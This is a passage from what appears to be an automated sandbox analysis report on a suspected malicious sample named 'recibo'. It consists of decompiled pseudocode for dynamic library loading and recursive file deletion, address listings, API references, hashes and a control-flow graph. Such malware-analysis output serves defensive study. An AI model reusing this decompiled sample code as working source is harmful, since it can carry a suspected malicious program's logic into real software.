								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E715416BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E715413B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E715416BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E715413B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E715413B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E715413B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E715412CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E715413B1(_t90) * 4);
					goto L165;
				}
			}


































































                                                                                  0x71541c07
                                                                                  0x71541c0a
                                                                                  0x71541c0d
                                                                                  0x71541c10
                                                                                  0x71541c13
                                                                                  0x71541c16
                                                                                  0x71541c19
                                                                                  0x71541c1b
                                                                                  0x71541c1e
                                                                                  0x71541c21
                                                                                  0x71541c26
                                                                                  0x71541c29
                                                                                  0x71541c31
                                                                                  0x71541c39
                                                                                  0x71541c3b
                                                                                  0x71541c3e
                                                                                  0x71541c46
                                                                                  0x71541c46
                                                                                  0x71541c4b
                                                                                  0x71541c4e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541c5b
                                                                                  0x71541c60
                                                                                  0x71541c62
                                                                                  0x71541cf4
                                                                                  0x71541cf4
                                                                                  0x71541cf4
                                                                                  0x71541cf8
                                                                                  0x71541cfb
                                                                                  0x71541cfd
                                                                                  0x71541d1f
                                                                                  0x71541d21
                                                                                  0x71541d24
                                                                                  0x71541d2d
                                                                                  0x71541d33
                                                                                  0x71541d35
                                                                                  0x71541d3b
                                                                                  0x71541d3b
                                                                                  0x71541d41
                                                                                  0x71541d44
                                                                                  0x71541d44
                                                                                  0x71541d47
                                                                                  0x71541d47
                                                                                  0x71541d4d
                                                                                  0x71541d4f
                                                                                  0x71541d4f
                                                                                  0x71541d51
                                                                                  0x71541d54
                                                                                  0x71541d57
                                                                                  0x71541d5d
                                                                                  0x71541d63
                                                                                  0x71541d66
                                                                                  0x71541d8a
                                                                                  0x71541d8d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541d90
                                                                                  0x71541d92
                                                                                  0x71541da0
                                                                                  0x71541da3
                                                                                  0x71541da5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541da7
                                                                                  0x71541da7
                                                                                  0x71541da7
                                                                                  0x71541dad
                                                                                  0x71541daf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541db1
                                                                                  0x71541db3
                                                                                  0x71541db5
                                                                                  0x71541db7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541db7
                                                                                  0x71541db9
                                                                                  0x71541dbb
                                                                                  0x71541dbd
                                                                                  0x71541dbd
                                                                                  0x71541dc3
                                                                                  0x71541dc9
                                                                                  0x71541dcb
                                                                                  0x71541ddf
                                                                                  0x71541ddf
                                                                                  0x71541de1
                                                                                  0x71541dcd
                                                                                  0x71541dd3
                                                                                  0x71541dd6
                                                                                  0x71541dd6
                                                                                  0x00000000
                                                                                  0x71541d68
                                                                                  0x71541d68
                                                                                  0x71541d68
                                                                                  0x71541d69
                                                                                  0x71541d71
                                                                                  0x71541d75
                                                                                  0x71541d7b
                                                                                  0x71541d7f
                                                                                  0x00000000
                                                                                  0x71541d7f
                                                                                  0x71541d6b
                                                                                  0x71541d6b
                                                                                  0x71541d6c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541d6e
                                                                                  0x71541d6f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541d6f
                                                                                  0x71541cff
                                                                                  0x71541d00
                                                                                  0x71541d09
                                                                                  0x71541d0c
                                                                                  0x71541d19
                                                                                  0x71541d19
                                                                                  0x71541d0e
                                                                                  0x71541d0e
                                                                                  0x71541de7
                                                                                  0x71541dea
                                                                                  0x71541dee
                                                                                  0x71541e61
                                                                                  0x71541e65
                                                                                  0x71541c43
                                                                                  0x00000000
                                                                                  0x71541c43
                                                                                  0x00000000
                                                                                  0x71541e65
                                                                                  0x71541cfd
                                                                                  0x71541c68
                                                                                  0x71541c6b
                                                                                  0x71541cce
                                                                                  0x71541cd1
                                                                                  0x71541ce3
                                                                                  0x71541ce3
                                                                                  0x71541ce6
                                                                                  0x71541df3
                                                                                  0x71541df6
                                                                                  0x71541df6
                                                                                  0x71541df8
                                                                                  0x715421ae
                                                                                  0x715421c6
                                                                                  0x715421c6
                                                                                  0x715421c9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421b3
                                                                                  0x715421b4
                                                                                  0x715421b7
                                                                                  0x715421ba
                                                                                  0x71542244
                                                                                  0x7154224b
                                                                                  0x71542251
                                                                                  0x71542255
                                                                                  0x71541e5c
                                                                                  0x71541e5d
                                                                                  0x71541e5d
                                                                                  0x71541e5e
                                                                                  0x00000000
                                                                                  0x71541e5e
                                                                                  0x715421c0
                                                                                  0x715421c3
                                                                                  0x715421c3
                                                                                  0x715421cb
                                                                                  0x715421ce
                                                                                  0x71542238
                                                                                  0x71541e51
                                                                                  0x71541e54
                                                                                  0x71541e57
                                                                                  0x71541e5a
                                                                                  0x71541e5a
                                                                                  0x00000000
                                                                                  0x71541e5a
                                                                                  0x715421d0
                                                                                  0x715421d3
                                                                                  0x715421da
                                                                                  0x715421da
                                                                                  0x715421dd
                                                                                  0x715421e1
                                                                                  0x715421f5
                                                                                  0x715421f5
                                                                                  0x715421f8
                                                                                  0x715421fc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421fe
                                                                                  0x71542202
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542204
                                                                                  0x7154220b
                                                                                  0x7154220b
                                                                                  0x71542211
                                                                                  0x71542214
                                                                                  0x71542230
                                                                                  0x71542216
                                                                                  0x7154221f
                                                                                  0x71542222
                                                                                  0x71542222
                                                                                  0x00000000
                                                                                  0x71542214
                                                                                  0x715421e3
                                                                                  0x715421e6
                                                                                  0x715421ea
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421ec
                                                                                  0x00000000
                                                                                  0x715421ec
                                                                                  0x715421d5
                                                                                  0x715421d8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421d8
                                                                                  0x71541dfe
                                                                                  0x71541dfe
                                                                                  0x71541dff
                                                                                  0x71541f49
                                                                                  0x71541f49
                                                                                  0x71541f50
                                                                                  0x71541f53
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541f60
                                                                                  0x00000000
                                                                                  0x7154214b
                                                                                  0x7154214e
                                                                                  0x71542151
                                                                                  0x71542151
                                                                                  0x71542152
                                                                                  0x71542153
                                                                                  0x71542156
                                                                                  0x71542159
                                                                                  0x7154215c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154215e
                                                                                  0x7154215e
                                                                                  0x71542162
                                                                                  0x7154217a
                                                                                  0x7154217d
                                                                                  0x71542181
                                                                                  0x71542187
                                                                                  0x00000000
                                                                                  0x71542187
                                                                                  0x71542164
                                                                                  0x71542164
                                                                                  0x71542167
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542169
                                                                                  0x7154216c
                                                                                  0x7154216e
                                                                                  0x7154216f
                                                                                  0x7154216f
                                                                                  0x7154216f
                                                                                  0x71542170
                                                                                  0x71542173
                                                                                  0x71542176
                                                                                  0x71542177
                                                                                  0x71542151
                                                                                  0x71542152
                                                                                  0x71542153
                                                                                  0x71542156
                                                                                  0x71542159
                                                                                  0x7154215c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154215c
                                                                                  0x00000000
                                                                                  0x71541fa7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541fb3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541f9a
                                                                                  0x71541f9e
                                                                                  0x71541fa2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154211c
                                                                                  0x71542120
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542126
                                                                                  0x7154212f
                                                                                  0x71542136
                                                                                  0x7154213e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542083
                                                                                  0x71542083
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541fbc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421a6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154208b
                                                                                  0x7154208d
                                                                                  0x7154208d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542196
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154219a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421a2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420d3
                                                                                  0x715420d5
                                                                                  0x715420d5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154209d
                                                                                  0x7154209f
                                                                                  0x7154209f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420af
                                                                                  0x715420b1
                                                                                  0x715420b1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420e1
                                                                                  0x715420e3
                                                                                  0x715420e3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420ba
                                                                                  0x715420bc
                                                                                  0x715420bc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420c1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154219e
                                                                                  0x715421a8
                                                                                  0x715421a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420ec
                                                                                  0x715420f0
                                                                                  0x715420f5
                                                                                  0x715420f8
                                                                                  0x715420f9
                                                                                  0x715420fc
                                                                                  0x71542102
                                                                                  0x71542102
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154218e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420c5
                                                                                  0x715420c7
                                                                                  0x715420c7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541fc3
                                                                                  0x71541fc3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420da
                                                                                  0x715420dc
                                                                                  0x715420dc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541f67
                                                                                  0x71541f6d
                                                                                  0x71541f70
                                                                                  0x71541f72
                                                                                  0x71541f72
                                                                                  0x71541f75
                                                                                  0x71541f79
                                                                                  0x71541f86
                                                                                  0x71541f88
                                                                                  0x71541f8e
                                                                                  0x71541f8e
                                                                                  0x71541f8e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154208e
                                                                                  0x7154208e
                                                                                  0x71542090
                                                                                  0x71542097
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420d6
                                                                                  0x715420d6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420a0
                                                                                  0x715420a0
                                                                                  0x715420a2
                                                                                  0x715420a9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420b2
                                                                                  0x715420b2
                                                                                  0x715420b4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420e4
                                                                                  0x715420e4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420bd
                                                                                  0x715420bd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154210a
                                                                                  0x7154210e
                                                                                  0x71542113
                                                                                  0x71542116
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420c8
                                                                                  0x715420c8
                                                                                  0x715420cb
                                                                                  0x715420cd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420dd
                                                                                  0x715420dd
                                                                                  0x715420e6
                                                                                  0x715420e6
                                                                                  0x71541fc5
                                                                                  0x71541fc5
                                                                                  0x71541fc8
                                                                                  0x71541fcf
                                                                                  0x71541fd1
                                                                                  0x71541fd3
                                                                                  0x71541fda
                                                                                  0x71541fdd
                                                                                  0x71541fe2
                                                                                  0x71541fe4
                                                                                  0x71541fe6
                                                                                  0x71541fea
                                                                                  0x71541ff0
                                                                                  0x71541ff6
                                                                                  0x71541ff6
                                                                                  0x71541ff8
                                                                                  0x71541ff8
                                                                                  0x71541ff9
                                                                                  0x71541ff9
                                                                                  0x71541ffd
                                                                                  0x71542003
                                                                                  0x71542005
                                                                                  0x71542009
                                                                                  0x7154200e
                                                                                  0x7154200e
                                                                                  0x71542010
                                                                                  0x71542010
                                                                                  0x71542013
                                                                                  0x71542016
                                                                                  0x7154201f
                                                                                  0x71542025
                                                                                  0x71542028
                                                                                  0x71542028
                                                                                  0x7154202a
                                                                                  0x7154202d
                                                                                  0x71542033
                                                                                  0x71542039
                                                                                  0x71542039
                                                                                  0x7154203b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542041
                                                                                  0x71542041
                                                                                  0x71542045
                                                                                  0x7154204c
                                                                                  0x71542070
                                                                                  0x71542070
                                                                                  0x71542074
                                                                                  0x71542076
                                                                                  0x71542079
                                                                                  0x71542079
                                                                                  0x7154207c
                                                                                  0x7154207c
                                                                                  0x00000000
                                                                                  0x71542074
                                                                                  0x71542051
                                                                                  0x71542054
                                                                                  0x71542054
                                                                                  0x7154205b
                                                                                  0x7154205d
                                                                                  0x71542060
                                                                                  0x71542067
                                                                                  0x71542068
                                                                                  0x7154206e
                                                                                  0x7154206e
                                                                                  0x00000000
                                                                                  0x7154206e
                                                                                  0x71542062
                                                                                  0x71542065
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542065
                                                                                  0x71541ff2
                                                                                  0x71541ff4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541f60
                                                                                  0x71541e05
                                                                                  0x71541e05
                                                                                  0x71541e06
                                                                                  0x71541f46
                                                                                  0x00000000
                                                                                  0x71541f46
                                                                                  0x71541e0c
                                                                                  0x71541e0d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541e13
                                                                                  0x71541e16
                                                                                  0x71541f0b
                                                                                  0x71541f0b
                                                                                  0x71541f0e
                                                                                  0x71541f23
                                                                                  0x71541f25
                                                                                  0x71541f25
                                                                                  0x71541f26
                                                                                  0x71541f29
                                                                                  0x71541f2c
                                                                                  0x71541f38
                                                                                  0x71541f38
                                                                                  0x71541f38
                                                                                  0x71541f2e
                                                                                  0x71541f2e
                                                                                  0x71541f2e
                                                                                  0x71541f3e
                                                                                  0x00000000
                                                                                  0x71541f3e
                                                                                  0x71541f10
                                                                                  0x71541f10
                                                                                  0x71541f11
                                                                                  0x71541f1f
                                                                                  0x00000000
                                                                                  0x71541f1f
                                                                                  0x71541f14
                                                                                  0x71541f15
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541f1b
                                                                                  0x00000000
                                                                                  0x71541f1b
                                                                                  0x71541e1c
                                                                                  0x71541f07
                                                                                  0x00000000
                                                                                  0x71541f07
                                                                                  0x71541e22
                                                                                  0x71541e22
                                                                                  0x71541e25
                                                                                  0x71541e4e
                                                                                  0x00000000
                                                                                  0x71541e4e
                                                                                  0x71541e27
                                                                                  0x71541e27
                                                                                  0x71541e2a
                                                                                  0x71541e44
                                                                                  0x00000000
                                                                                  0x71541e44
                                                                                  0x71541e2c
                                                                                  0x71541e2c
                                                                                  0x71541e2f
                                                                                  0x71541e3e
                                                                                  0x00000000
                                                                                  0x71541e3e
                                                                                  0x71541e32
                                                                                  0x71541e33
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541e35
                                                                                  0x00000000
                                                                                  0x71541cec
                                                                                  0x71541cec
                                                                                  0x71541cef
                                                                                  0x00000000
                                                                                  0x71541cef
                                                                                  0x71541ce6
                                                                                  0x71541cd3
                                                                                  0x71541cd8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541cda
                                                                                  0x71541cdd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541cdd
                                                                                  0x71541c6d
                                                                                  0x71541c70
                                                                                  0x71541ca6
                                                                                  0x71541ca9
                                                                                  0x00000000
                                                                                  0x71541caf
                                                                                  0x71541cb1
                                                                                  0x71541cb5
                                                                                  0x71541cbc
                                                                                  0x71541cc3
                                                                                  0x71541cc6
                                                                                  0x71541cc9
                                                                                  0x00000000
                                                                                  0x71541cc9
                                                                                  0x71541ca9
                                                                                  0x71541c72
                                                                                  0x71541c73
                                                                                  0x71541c8e
                                                                                  0x71541c91
                                                                                  0x00000000
                                                                                  0x71541c97
                                                                                  0x71541c97
                                                                                  0x71541c9e
                                                                                  0x71541ca1
                                                                                  0x00000000
                                                                                  0x71541ca1
                                                                                  0x71541c91
                                                                                  0x71541c78
                                                                                  0x00000000
                                                                                  0x71541c7e
                                                                                  0x71541c7e
                                                                                  0x71541c85
                                                                                  0x00000000
                                                                                  0x71541c85
                                                                                  0x71541c78
                                                                                  0x71541e74
                                                                                  0x71541e79
                                                                                  0x71541e7e
                                                                                  0x71541e82
                                                                                  0x71542355
                                                                                  0x7154235b
                                                                                  0x71541e94
                                                                                  0x71541e96
                                                                                  0x71541e97
                                                                                  0x7154227e
                                                                                  0x7154227e
                                                                                  0x71542281
                                                                                  0x71542284
                                                                                  0x715422a1
                                                                                  0x715422a7
                                                                                  0x715422a9
                                                                                  0x715422af
                                                                                  0x715422c6
                                                                                  0x715422c6
                                                                                  0x715422c6
                                                                                  0x715422d3
                                                                                  0x715422d9
                                                                                  0x715422dc
                                                                                  0x715422e2
                                                                                  0x715422e4
                                                                                  0x715422e8
                                                                                  0x715422ea
                                                                                  0x715422f1
                                                                                  0x715422f6
                                                                                  0x715422f9
                                                                                  0x715422fb
                                                                                  0x71542300
                                                                                  0x71542312
                                                                                  0x71542312
                                                                                  0x71542300
                                                                                  0x715422f9
                                                                                  0x715422e8
                                                                                  0x71542318
                                                                                  0x7154231b
                                                                                  0x71542325
                                                                                  0x7154232d
                                                                                  0x7154233a
                                                                                  0x71542340
                                                                                  0x71542343
                                                                                  0x71542273
                                                                                  0x71542273
                                                                                  0x00000000
                                                                                  0x71542273
                                                                                  0x71542349
                                                                                  0x7154234f
                                                                                  0x7154234f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542351
                                                                                  0x71542351
                                                                                  0x71542351
                                                                                  0x71542351
                                                                                  0x00000000
                                                                                  0x7154231d
                                                                                  0x7154231d
                                                                                  0x71542323
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542323
                                                                                  0x7154231b
                                                                                  0x715422b2
                                                                                  0x715422b8
                                                                                  0x715422ba
                                                                                  0x715422c0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715422c0
                                                                                  0x71542286
                                                                                  0x7154228d
                                                                                  0x71542293
                                                                                  0x71542299
                                                                                  0x00000000
                                                                                  0x71542299
                                                                                  0x71541e9d
                                                                                  0x71541e9e
                                                                                  0x7154225d
                                                                                  0x7154225d
                                                                                  0x71542263
                                                                                  0x71542266
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154226d
                                                                                  0x71542272
                                                                                  0x00000000
                                                                                  0x71542272
                                                                                  0x71541ea5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541eab
                                                                                  0x71541eab
                                                                                  0x71541eb4
                                                                                  0x71541eb9
                                                                                  0x71541ebf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541ec5
                                                                                  0x71541ed2
                                                                                  0x71541ed8
                                                                                  0x71541ee2
                                                                                  0x71541ee8
                                                                                  0x71541ef0
                                                                                  0x71541f00
                                                                                  0x00000000
                                                                                  0x71541f00

                                                                                  APIs
                                                                                    • Part of subcall function 715412BB: GlobalAlloc.KERNEL32(00000040,?,715412DB,?,7154137F,00000019,715411CA,-000000A0), ref: 715412C5
                                                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 71541D2D
                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 71541D75
                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 71541D7F
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 71541D92
                                                                                  • GlobalFree.KERNEL32(?), ref: 71541E74
                                                                                  • GlobalFree.KERNEL32(?), ref: 71541E79
                                                                                  • GlobalFree.KERNEL32(?), ref: 71541E7E
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 71542068
                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 71542222
                                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 715422A1
                                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 715422B2
                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 7154230C
                                                                                  • lstrlenW.KERNEL32(00000808), ref: 71542326
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 245916457-0
                                                                                  • Opcode ID: ae3df4feb234a723de88c8fa929ac33ae3e875db2cb87ebcace4bbb90759d838
                                                                                  • Instruction ID: 971e6f915a2ac58f0257740e8f92cfc8afeaed39ccc38e1a21d215cfb4d67751
                                                                                  • Opcode Fuzzy Hash: ae3df4feb234a723de88c8fa929ac33ae3e875db2cb87ebcace4bbb90759d838
                                                                                  • Instruction Fuzzy Hash: 8D22CE75D0421ADEDB1ADFA4D9C02EDBBF1FB04305F20692ED9A6E7280D7706A85CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 663 405c49-405c6f call 405f14 666 405c71-405c83 DeleteFileW 663->666 667 405c88-405c8f 663->667 668 405e05-405e09 666->668 669 405c91-405c93 667->669 670 405ca2-405cb2 call 40653d 667->670 671 405db3-405db8 669->671 672 405c99-405c9c 669->672 676 405cc1-405cc2 call 405e58 670->676 677 405cb4-405cbf lstrcatW 670->677 671->668 675 405dba-405dbd 671->675 672->670 672->671 678 405dc7-405dcf call 406873 675->678 679 405dbf-405dc5 675->679 680 405cc7-405ccb 676->680 677->680 678->668 686 405dd1-405de5 call 405e0c call 405c01 678->686 679->668 684 405cd7-405cdd lstrcatW 680->684 685 405ccd-405cd5 680->685 687 405ce2-405cfe lstrlenW FindFirstFileW 684->687 685->684 685->687 703 405de7-405dea 686->703 704 405dfd-405e00 call 40559f 686->704 688 405d04-405d0c 687->688 689 405da8-405dac 687->689 691 405d2c-405d40 call 40653d 688->691 692 405d0e-405d16 688->692 689->671 694 405dae 689->694 705 405d42-405d4a 691->705 706 405d57-405d62 call 405c01 691->706 695 405d18-405d20 692->695 696 405d8b-405d9b FindNextFileW 692->696 694->671 695->691 699 405d22-405d2a 695->699 696->688 702 405da1-405da2 FindClose 696->702 699->691 699->696 702->689 703->679 707 405dec-405dfb call 40559f call 4062fd 703->707 704->668 705->696 708 405d4c-405d55 call 405c49 705->708 716 405d83-405d86 call 40559f 706->716 717 405d64-405d67 706->717 707->668 708->696 716->696 720 405d69-405d79 call 40559f call 4062fd 717->720 721 405d7b-405d81 717->721 720->696 721->696
                                                                                  C-Code - Quality: 98%
                                                                                  			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
